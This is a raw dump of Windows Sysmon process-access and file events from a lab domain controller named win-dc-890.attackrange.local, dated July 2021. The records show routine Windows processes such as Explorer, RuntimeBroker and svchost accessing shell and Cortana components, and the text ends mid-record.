07:51:42.118{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF7D84B885A71921F74A0140DA7EC2F9,SHA256=D9A0B273498D3704B153D2DB09C842CB731C8D1F72C12AF032F2444C41152B6D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048450Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.326{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48DDB00A33134D497333BA14FEA7BAEA,SHA256=69C712BA86B74510B6954C0AEAD5EAEF60A86B4229F04D1F865396399076F802,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048449Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.261{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001048448Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:42.261{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001048447Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:42.259{466BC892-32D3-60E8-770B-00000000CF01}63564564C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048446Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.259{466BC892-32D3-60E8-770B-00000000CF01}63564564C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048445Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:42.242{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001048444Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:42.242{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001048443Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:42.242{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001048442Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:42.242{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001048441Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:42.242{466BC892-32D3-60E8-770B-00000000CF01}63565956C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048440Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.242{466BC892-32D3-60E8-770B-00000000CF01}63565956C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048439Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:42.242{466BC892-32D3-60E8-770B-00000000CF01}635610012C:\Windows\Explorer.EXE{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048438Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.242{466BC892-32D3-60E8-770B-00000000CF01}635610012C:\Windows\Explorer.EXE{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048437Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:42.242{466BC892-02BC-60E8-2C00-00000000CF01}30641160C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\tileobjserver.dll+bce2|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001048436Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:42.242{466BC892-02BC-60E8-2C00-00000000CF01}30641160C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|c:\windows\system32\tileobjserver.dll+bc8f|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a 10341000x80000000000000001048435Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.242{466BC892-32D3-60E8-770B-00000000CF01}63565956C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001048434Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.242{466BC892-32D3-60E8-770B-00000000CF01}635610012C:\Windows\Explorer.EXE{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048433Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.226{466BC892-32D3-60E8-770B-00000000CF01}635610012C:\Windows\Explorer.EXE{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048432Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:42.226{466BC892-32D3-60E8-770B-00000000CF01}635610012C:\Windows\Explorer.EXE{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048431Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:42.226{466BC892-32D3-60E8-770B-00000000CF01}635610012C:\Windows\Explorer.EXE{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048430Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:42.226{466BC892-02AF-60E8-0D00-00000000CF01}9009736C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048429Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:42.226{466BC892-02AF-60E8-0D00-00000000CF01}9009736C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048428Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:42.226{466BC892-02AF-60E8-0D00-00000000CF01}9009736C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048427Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:42.226{466BC892-02AF-60E8-0D00-00000000CF01}9009736C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C: